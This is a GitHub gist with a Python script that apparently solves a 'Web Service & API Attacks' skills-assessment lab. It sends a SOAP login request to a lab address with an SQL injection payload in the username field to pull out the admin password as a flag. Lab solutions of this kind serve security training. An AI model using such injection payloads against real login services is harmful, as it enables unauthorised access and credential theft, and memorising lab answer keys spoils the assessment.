Created
August 10, 2025 19:35
-
-
Save rudSarkar/a2a00f04456b98d174eb7090e3886619 to your computer and use it in GitHub Desktop.
Web Service & API Attacks - Skills Assessment
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| Submit the password of the user that has a username of "admin". Answer format: FLAG{string}. Please note that the service will respond successfully only after submitting the proper SQLi payload, otherwise it will hang or throw an error. | |
| """ | |
| import requests | |
| url = "http://10.129.247.185:3002/wsdl" | |
| username = "admin' or '1'='" | |
| password = "password" | |
| soap_body = f"""<?xml version="1.0" encoding="utf-8"?> | |
| <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
| xmlns:xsd="http://www.w3.org/2001/XMLSchema" | |
| xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> | |
| <soap:Body> | |
| <LoginRequest xmlns="http://tempuri.org/"> | |
| <username>{username}</username> | |
| <password>{password}</password> | |
| </LoginRequest> | |
| </soap:Body> | |
| </soap:Envelope> | |
| """ | |
| headers = { | |
| "Content-Type": "text/xml; charset=utf-8", | |
| "SOAPAction": "\"Login\"" | |
| } | |
| response = requests.post(url, data=soap_body, headers=headers) | |
| print("Status Code:", response.status_code) | |
| print("Response Body:\n", response.text) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment